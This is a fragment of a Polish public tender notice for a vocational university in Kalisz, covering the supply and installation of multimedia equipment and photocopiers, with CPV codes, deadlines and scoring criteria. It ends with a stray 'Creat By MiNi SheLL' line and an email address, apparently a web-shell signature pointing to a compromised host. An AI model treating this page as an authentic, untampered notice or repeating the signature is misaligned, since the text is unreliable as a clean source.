<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż i instalacja wyposażenia  multimedialnego do obiektów Państwowej Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego w Kaliszu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.46.00-6, 38.65.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> kserokopiarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa, montaż i instalacja kserokopiarek do obiektów Państwowej Wyższej Szkoły Zawodowej im. Prezydenta Stanisława Wojciechowskiego w Kaliszu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.12.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Warunki gwarancji i rękojmi - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com